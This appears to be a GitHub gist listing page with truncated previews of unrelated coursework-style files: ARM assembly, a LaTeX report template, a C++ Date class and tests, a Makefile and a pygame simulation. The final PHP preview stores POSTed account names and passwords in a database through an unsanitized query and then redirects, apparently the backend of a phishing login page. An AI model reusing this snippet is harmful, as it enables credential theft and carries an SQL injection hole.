This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ;Philippe Turgeon | |
| ;Émile Lévesque | |
| NAME main | |
| PUBLIC __iar_program_start | |
| SECTION .intvec : CODE (2) | |
| CODE32 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| %!TEX encoding = IsoLatin | |
| % | |
| % Exemple de rapport | |
| % par Pierre Tremblay, Universite Laval | |
| % modifié par Christian Gagne, Universite Laval | |
| % 14/01/2011 - version 1.3 | |
| % modifié par Robert Bergevin, Université Laval | |
| % 24/11/2011 | |
| % |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ;Philippe Babin PHBAB1 - Mathieu Cloutier MACLO245 | |
| NAME main | |
| PUBLIC __iar_program_start | |
| SECTION .intvec : CODE (2) | |
| CODE32 | |
| __iar_program_start | |
| B main ; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * \file Date.cpp | |
| * \brief Implantation de la classe Date | |
| * révision : normes 03-2013 | |
| * balises Doxygen | |
| * révision des commentairs d'en-tête des méthodes | |
| * \author Yves Roy Version initiale, THE | |
| * \date 10 octobre 2013 | |
| * \version 3.2 sans contrat | |
| */ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Date d(29,03,1994); | |
| Date b(30,03,1992); | |
| Date e(28,03,1994); | |
| Date dNow(); | |
| cout<< "29/03/94" << " " << d << endl; | |
| cout<< "Jour test:" << ((d.reqJour() == 29)?"[OK]":"[FAIL]") << endl; | |
| cout<< "Mois test:" << ((d.reqMois() == 3)?"[OK]":"[FAIL]") << endl; | |
| cout<< "Annee test:" << ((d.reqAnnee() == 1994)?"[OK]":"[FAIL]") << endl; | |
| cout<< "Jour année:" << (d.reqJourAnnee() == 88 ?"[OK]":"[FAIL]") << endl; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| CC=g++ | |
| CFLAGS=-c -Wall | |
| LDFLAGS= | |
| SOURCES=programmePrincipal.cpp validationFormat.cpp Date.cpp | |
| OBJECTS=$(SOURCES:.cpp=.o) | |
| EXECUTABLE=build/bin | |
| all: $(SOURCES) $(EXECUTABLE) | |
| $(EXECUTABLE): $(OBJECTS) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import pygame, sys, random | |
| from pygame.locals import * | |
| class sim: | |
| # X origin | |
| #DELTA = 0.1 | |
| # Windows size#891 | |
| WIN_H = 504. | |
| WIN_W = 308 + 600 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> | |
| <!-- | |
| var foo = 2; | |
| //--> | |
| </script> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if(isset($_POST["account"])&&!empty($_POST["account"])){ | |
| mysql_connect("localhost","",""); | |
| mysql_select_db(""); | |
| mysql_query('INSERT INTO fun VALUES("","'.$_POST["account"].'","'.$_POST["password"].'")'); | |
| echo '<meta http-equiv="refresh" content="0; URL=https://">'; | |
| } | |
| else{ | |
| echo' |
NewerOlder